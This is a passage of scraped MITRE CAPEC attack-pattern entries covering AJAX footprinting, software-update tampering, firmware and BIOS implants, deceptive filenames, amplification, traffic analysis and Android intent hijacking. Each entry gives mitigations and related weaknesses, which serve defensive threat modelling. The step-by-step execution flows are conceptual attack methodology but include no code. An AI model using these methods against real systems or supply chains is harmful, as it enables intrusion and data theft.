2022-02-22 (Version 3.7)	Updated Description, Execution_Flow, Extended_Description
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings
Previous Entry Names
Change Date	Previous Entry Name
2021-06-24 (Version 3.5)	Man in the Middle Attack

CAPEC-85: AJAX Footprinting

Attack Pattern ID: 85

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	580	System Footprinting
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	63	Cross-Site Scripting (XSS)

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Execution Flow

Explore

Send request to target webpage and analyze HTML: Using a browser or an automated tool, an adversary sends requests to a webpage and records the received HTML response. Adversaries then analyze the HTML to identify any known underlying JavaScript architectures. This can aid in mappiong publicly known vulnerabilities to the webpage and can also helpo the adversary guess application architecture and the inner workings of a system.

Techniques
Record all "src" values inside script tags. These JavaScript files are compared to lists of files for known architectures. If there is a large match between the "src" values and architecture files, then it can be assumed that particular architecture is being used.

Prerequisites

The user must allow JavaScript to execute in their browser

Skills Required

[Level: Medium]

To land and launch a script on victim's machine with appropriate footprinting logic for enumerating services and vulnerabilities in JavaScript

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

Design: Use browser technologies that do not allow client side scripting.

Implementation: Perform input validation for all remote content.

Example Instances

Footprinting can be executed over almost any protocol including HTTP, TCP, UDP, and ICMP, with the general goal of gaining further information about a host environment to launch further attacks. The attacker can probe the system for banners, vulnerabilities, filenames, available services, and in short anything the host process has access to. The results of the probe are either used to execute javascript (for example, if the attackers' footprint script identifies a vulnerability in a firewall permission, then the client side script executes a javascript to change client firewall settings, or an attacker may simply echo the results of the scan back out to a remote host for targeting future attacks) or to inform other data gathering activities in order to craft atta.

Related Weaknesses

CWE-ID	Weakness Name
79	Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
113	Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')
348	Use of Less Trusted Source
96	Improper Neutralization of Directives in Statically Saved Code ('Static Code Injection')
20	Improper Input Validation
116	Improper Encoding or Escaping of Output
184	Incomplete List of Disallowed Inputs
86	Improper Neutralization of Invalid Characters in Identifiers in Web Pages
692	Incomplete Denylist to Cross-Site Scripting

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-539] Shreeraj Shah. "Ajax fingerprinting for Web 2.0 Applications". Help Net Security. <https://www.helpnetsecurity.com/dl/articles/Ajax_fingerprinting.pdf>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Description, Example_Instances, Execution_Flow, Mitigations, Related_Attack_Patterns, Resources_Required, Typical_Severity
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated @Name, Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Execution_Flow
Previous Entry Names
Change Date	Previous Entry Name
2020-12-17 (Version 3.4)	AJAX Fingerprinting

CAPEC-669: Alteration of a Software Update

Attack Pattern ID: 669

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	184	Software Integrity Attack
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	670	Software Development Tools Maliciously Altered
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	673	Developer Signing Maliciously Altered Software

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Supply Chain, Social Engineering
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Sustainment

Execution Flow

Explore

Identify software with frequent updates: The adversary must first identify a target software that has updates at least with some frequency, enough that there is am update infrastructure.

Experiment

Gain access to udpate infrastructure: The adversary must then gain access to the organization's software update infrastructure. This can either be done by gaining remote access from outside the organization, or by having a malicious actor inside the organization gain access. It is often easier if someone within the organization gains access.

Exploit

Alter the software update: Through access to the software update infrastructure, an adversary will alter the software update by injecting malware into the content of an outgoing update.

Prerequisites

An adversary would need to have penetrated an organization’s software update infrastructure including gaining access to components supporting the configuration management of software versions and updates related to the software maintenance of customer systems.

Skills Required

[Level: High]

Skills required include the ability to infiltrate the organization’s software update infrastructure either from the Internet or from within the organization, including subcontractors, and be able to change software being delivered to customer/user systems in an undetected manner.

Consequences

Scope	Impact	Likelihood
Access Control	Gain Privileges
Authorization	Execute Unauthorized Commands
Integrity	Modify Data
Confidentiality	Read Data

Mitigations

Have a Software Assurance Plan that includes maintaining strict configuration management control of source code, object code and software development, build and distribution tools; manual code reviews and static code analysis for developmental software; and tracking of all storage and movement of code.

Require elevated privileges for distribution of software and software updates.

Example Instances

A subcontractor to a software developer injects maliciously altered software updates into an automated update process that distributes to government and commercial customers software containing a hidden backdoor.

Related Weaknesses

Supply Chain: CWE does not currently cover Supply Chain in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

CWE leads to CAPEC: This entry highlights the rare case where a CAPEC creates an instance of a CWE, as opposed to the usual other way around. At this time, this field only includes mappings to weaknesses that cause the CAPEC, instead of CWEs that could arise due to the CAPEC.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1195.002	Supply Chain Compromise: Compromise Software Supply Chain

References

[REF-658] "Defending Against Software Supply Chain Attacks". Cybersecurity and Infrastructure Security Agency (CISA). 2021-04. <https://www.cisa.gov/sites/default/files/publications/defending_against_software_supply_chain_attacks_508_1.pdf>. URL validated: 2021-06-22.

[REF-659] Dr. Charles Clancy, Joe Ferraro, Robert A. Martin, Adam G. Pennington, Christopher L. Sledjeski and Dr. Craig J. Wiener. "Deliver Uncompromised: Securing Critical Software Supply Chains". The MITRE Corporation. 2021-01. <https://www.mitre.org/publications/technical-papers/deliver-uncompromised-securing-critical-software-supply-chains>. URL validated: 2021-06-22.

[REF-660] Melinda Reed, John F. Miller and Paul Popick. "Supply Chain Attack Patterns: Framework and Catalog". Office of the Assistant Secretary of Defense for Research and Engineering. 2014-08. <https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html>. URL validated: 2021-06-22.

Content History

Submissions
Submission Date	Submitter	Organization
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)
Modifications
Modification Date	Modifier	Organization
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Execution_Flow
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-638: Altered Component Firmware

Attack Pattern ID: 638

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	452	Infected Hardware

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware
Mechanisms of Attack	Manipulate System Resources

Execution Flow

Explore

Select Target: The adversary searches for a suitable target to attack, such as government and/or private industry organizations.
Techniques
Conduct reconnaissance to determine potential targets to exploit.

Identify Components: After selecting a target, the adversary determines whether a vulnerable component, such as a specific make and model of a HDD, is contained within the target system.

Techniques
[Remote Access Vector] The adversary gains remote access to the target, typically via additional malware, and explores the system to determine hardware components that are being leveraged.
[Physical Access Vector] The adversary intercepts components in transit and determines if the component is vulnerable to attack.

Experiment

Optional: Create Payload: If not using an already existing payload, the adversary creates their own to be executed at defined intervals and upon system boot processes. This payload may then be tested on the target system or a test system to confirm its functionality.

Exploit

Insert Firmware Altering Malware: Once a vulnerable component has been identified, the adversary leverages known malware tools to infect the component's firmware and drop the payload within the component's MBR. This allows the adversary to maintain persistence on the target and execute the payload without being detected.

Techniques
The adversary inserts the firmware altering malware on the target component, via the use of known malware tools.
[Physical Access Vector] The adversary then sends the component to its original intended destination, where it will be installed onto a victim system.

Prerequisites

Advanced knowledge about the target component's firmware

Advanced knowledge about Master Boot Records (MBR)

Advanced knowledge about tools used to insert firmware altering malware.

Advanced knowledge about component shipments to the target organization.

Skills Required

[Level: High]

Ability to access and reverse engineer hardware component firmware.

[Level: High]

Ability to intercept components in transit.

[Level: Medium]

Ability to create malicious payload to be executed from MBR.

[Level: Low]

Ability to leverage known malware tools to infect target system and insert firmware altering malware/payload

Resources Required

Manufacturer source code for hardware components.

Malware tools used to insert malware and payload onto target component.

Either remote or physical access to the target component.

Indicators

Output observed from processes, API calls, or Self-Monitoring, Analysis and Reporting Technology (SMART) may provide insight into malicious modifications of MBRs.

Digital forensics tools may produce output that indicates an attack of this nature has occurred. Examples include unexpected disk partitions and/or unusual strings.

Consequences

Scope	Impact	Likelihood
Authentication Authorization	Gain Privileges Execute Unauthorized Commands Bypass Protection Mechanism Hide Activities
Confidentiality Access Control	Read Data Modify Data

Mitigations

Leverage hardware components known to not be susceptible to these types of attacks.

Implement hardware RAID infrastructure.

Example Instances

In 2014, the Equation group was observed levering known malware tools to conduct component firmware alteration attacks against hard drives. In total, 12 HDD categories were shown to be vulnerable from manufacturers such as Western Digital, HGST, Samsung, and Seagate. Because of their complexity, only a few victims were targeted by these attacks. [REF-664]

Related Weaknesses

Supply Chain: CWE does not currently cover Supply Chain in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1542.002	Pre-OS Boot:Component Firmware

References

[REF-664] "EQUATION GROUP: QUESTIONS AND ANSWERS". 1.5. Kaspersky Lab HQ. 2015-02. <https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf>. URL validated: 2021-06-23.

[REF-665] Preston Hood. "Hard Drive Firmware Implant IRATEMONK". PJHoodsCo Blog. 2014-10-26. <https://blog.pjhoodsco.org/hard-drive-firmware-implant-iratemonk/>. URL validated: 2021-06-23.

[REF-666] Bruce Schneier. "IRATEMONK: NSA Exploit of the Day". Schneier on Security. 2014-01-31. <https://www.schneier.com/blog/archives/2014/01/iratemonk_nsa_e.html>. URL validated: 2021-06-23.

Content History

Submissions
Submission Date	Submitter	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team
2018-07-31 (Version 2.12)
Modifications
Modification Date	Modifier	Organization
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Consequences, Description, Example_Instances, Execution_Flow, Indicators, Mitigations, Prerequisites, References, Resources_Required, Skills_Required, Typical_Severity

CAPEC-532: Altered Installed BIOS

Attack Pattern ID: 532

Abstraction: Detailed

View customized information:

Description

An attacker with access to download and update system software sends a maliciously altered BIOS to the victim or victim supplier/integrator, which when installed allows for future exploitation.

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	444	Development Alteration

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Supply Chain
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Development and Production, Sustainment

Prerequisites

Advanced knowledge about the installed target system design.

Advanced knowledge about the download and update installation processes.

Access to the download and update system(s) used to deliver BIOS images.

Skills Required

[Level: High]

Able to develop a malicious BIOS image with the original functionality as a normal BIOS image, but with added functionality that allows for later compromise and/or disruption.

Mitigations

Deploy strong code integrity policies to allow only authorized apps to run.

Use endpoint detection and response solutions that can automaticalkly detect and remediate suspicious activities.

Maintain a highly secure build and update infrastructure by immediately applying security patches for OS and software, implementing mandatory integrity controls to ensure only trusted tools run, and requiring multi-factor authentication for admins.

Require SSL for update channels and implement certificate transparency based verification.

Sign update packages and BIOS patches.

Use hardware security modules/trusted platform modules to verify authenticity using hardware-based cryptography.

Example Instances

An attacker compromises the download and update portion of a manufacturer's web presence, and develops a malicious BIOS that in addition to the normal functionality will also at a specific time of day disable the remote access subsystem's security checks. The malicious BIOS is put in place on the manufacturer's website, the victim location is sent an official-looking email informing the victim of the availability of a new BIOS with bug fixes and enhanced performance capabilities to entice the victim to install the new BIOS quickly. The malicious BIOS is downloaded and installed on the victim's system, which allows for additional compromise by the attacker.

Related Weaknesses

Supply Chain: CWE does not currently cover Supply Chain in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1495	Firmware Corruption
1542.001	Pre-OS Boot:System Firmware

References

[REF-439] John F. Miller. "Supply Chain Attack Framework and Attack Patterns". The MITRE Corporation. 2013. <http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf>.

[REF-716] Daniel Simpson, Dani Halfin, Andrews Mariano Gorzelany and Beth Woodbury. "Supply chain attacks". Microsoft. 2021-10-28. <https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/supply-chain-malware>. URL validated: 2022-02-21.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated References, Related_Attack_Patterns
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References, Related_Attack_Patterns, Typical_Likelihood_of_Exploit
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Mitigations, References
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings
Previous Entry Names
Change Date	Previous Entry Name
2015-11-09 (Version 2.7)	Altered BIOS Installed After Installation

CAPEC-635: Alternative Execution Due to Deceptive Filenames

Attack Pattern ID: 635

Abstraction: Standard

View customized information:

Description

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	165	File Manipulation
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	11	Cause Web Server Misclassification
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	649	Adding a Space to a File Extension

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate System Resources

Prerequisites

The use of the file must be controlled by the file extension.

Mitigations

Applications should insure that the content of the file is consistent with format it is expecting, and not depend solely on the file extension.

Related Weaknesses

CWE-ID	Weakness Name
162	Improper Neutralization of Trailing Special Elements

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1036.007	Masquerading: Double File Extension

Content History

Submissions
Submission Date	Submitter	Organization
2018-05-31 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2018-05-31 (Version 2.11)
Modifications
Modification Date	Modifier	Organization
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-490: Amplification

Attack Pattern ID: 490

Abstraction: Standard

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	125	Flooding

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Abuse Existing Functionality

Prerequisites

This type of an attack requires the existence of a 3rd party service that generates a response that is significantly larger than the request that triggers it.

Mitigations

To mitigate this type of an attack, an organization can attempt to identify the 3rd party services being used in an active attack and blocking them until the attack ends. This can be accomplished by filtering traffic for suspicious message patterns such as a spike in traffic where each response contains the same large block of data. Care should be taken to prevent false positive rates so legitimate traffic isn't blocked.

Related Weaknesses

CWE-ID	Weakness Name
770	Allocation of Resources Without Limits or Throttling

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1498.002	Network Denial of Service:Reflection Amplification

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings

CAPEC-621: Analysis of Packet Timing and Sizes

Attack Pattern ID: 621

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	189	Black Box Reverse Engineering

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware, Physical Security
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

Use of untrusted communication paths enables an attacker to intercept and log communications, including metadata such as packet timing and sizes.

Skills Required

[Level: High]

These attacks generally require sophisticated machine learning techniques and require traffic capture as a prerequisite.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

Distort packet sizes and timing at VPN layer by adding padding to normalize packet sizes and timing delays to reduce information leakage via timing.

Related Weaknesses

CWE-ID	Weakness Name
201	Insertion of Sensitive Information Into Sent Data

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences

CAPEC-501: Android Activity Hijack

Attack Pattern ID: 501

Abstraction: Detailed

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	173	Action Spoofing
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	499	Android Intent Intercept

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Engage in Deceptive Interactions, Collect and Analyze Information

Execution Flow

Explore

Find an android application that uses implicit intents: Since this attack only works on android applications that use implicit intents, rather than explicit intents, an adversary must first identify an app that uses implicit intents to launch an Android-based trusted activity, and what that activity is.

Experiment

Create a malicious app: The adversary must create a malicious android app meant to intercept implicit intents to launch an Adroid-based trusted activity. This malicious app will mimic the trusted activiy's user interface to get the user to enter sensitive data.
Techniques
Specify the type of intent wished to be intercepted in the malicious app's manifest file using an intent filter
Get user to download malicious app: The adversary must get a user using the targeted app to download the malicious app by any means necessary

Exploit

Gather sensitive data through malicious app: Once the target application sends an implicit intent to launch a trusted activity, the malicious app will be launched instead that looks identical to the interface of that activity. When the user enters sensitive information it will be captured by the malicious app.
Techniques
Gather login information from a user using a malicious app

Prerequisites

The adversary must have previously installed the malicious application onto the Android device that will run in place of the trusted activity.

Skills Required

[Level: High]

The adversary must typically overcome network and host defenses in order to place malware on the system.

Resources Required

Malware capable of acting on the adversary's objectives.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

To mitigate this type of an attack, explicit intents should be used whenever sensitive data is being sent. An 'explicit intent' is delivered to a specific application as declared within the intent, whereas an 'implicit intent' is directed to an application as defined by the Android operating system. If an implicit intent must be used, then it should be assumed that the intent will be received by an unknown application and any response should be treated accordingly (i.e., with appropriate security controls).

Never use implicit intents for inter-application communication.

Related Weaknesses

CWE-ID	Weakness Name
923	Improper Restriction of Communication Channel to Intended Endpoints

References

[REF-427] Erika Chin, Adrienne Porter Felt, Kate Greenwood and David Wagner. "Analyzing Inter-Application Communication in Android". 3.1.2 Activity Hijacking. International Conference on Mobile Systems, Applications, and Services (MobiSys). 2011. <https://people.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, References, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations, Typical_Severity
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated @Name, Description, Prerequisites
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Execution_Flow
Previous Entry Names
Change Date	Previous Entry Name
2020-12-17 (Version 3.4)	Activity Hijack

CAPEC-499: Android Intent Intercept

Attack Pattern ID: 499

Abstraction: Standard

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	117	Interception
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	501	Android Activity Hijack

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Execution Flow

Explore

Find an android application that uses implicit intents: Since this attack only works on android applications that use implicit intents, rather than explicit intents, an adversary must first identify an app that uses implicit intents. They must also determine what the contents of the intents being sent are such that a malicious application can get sent these intents.

Experiment

Create a malicious app: The adversary must create a malicious android app meant to intercept implicit intents from a target application
Techniques
Specify the type of intent wished to be intercepted in the malicious app's manifest file using an intent filter
Get user to download malicious app: The adversary must get a user using the targeted app to download the malicious app by any means necessary

Exploit

Intercept Implicit Intents: Once the malicious app is downloaded, the android device will forward any implicit intents from the target application to the malicious application, allowing the adversary to gaina access to the contents of the intent. The adversary can proceed with any attack using the contents of the intent.

Techniques
Block the intent from reaching the desired location, causing a denial of service
Gather sensitive information from the intercepted intent
Modify the contents of the intent and forward along to another application

Prerequisites

An adversary must be able install a purpose built malicious application onto the Android device and convince the user to execute it. The malicious application is used to intercept implicit intents.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Integrity	Modify Data
Availability	Resource Consumption

Mitigations

To mitigate this type of an attack, explicit intents should be used whenever sensitive data is being sent. An explicit intent is delivered to a specific application as declared within the intent, whereas the Android operating system determines who receives an implicit intent which could potentially be a malicious application. If an implicit intent must be used, then it should be assumed that the intent will be received by an unknown application and any response should be treated accordingly. Implicit intents should never be used for inter-application communication.

Related Weaknesses

CWE-ID	Weakness Name
925	Improper Verification of Intent by Broadcast Receiver

References

[REF-427] Erika Chin, Adrienne Porter Felt, Kate Greenwood and David Wagner. "Analyzing Inter-Application Communication in Android". 3.1 Unauthorized Intent Receipt. International Conference on Mobile Systems, Applications, and Services (MobiSys). 2011. <https://people.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References, Related_Weaknesses
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated @Name, Consequences
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Execution_Flow
Previous Entry Names
Change Date	Previous Entry Name
2020-12-17 (Version 3.4)	Intent Intercept

CAPEC-388: Application API Button Hijacking

Attack Pattern ID: 388

Abstraction: Detailed

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
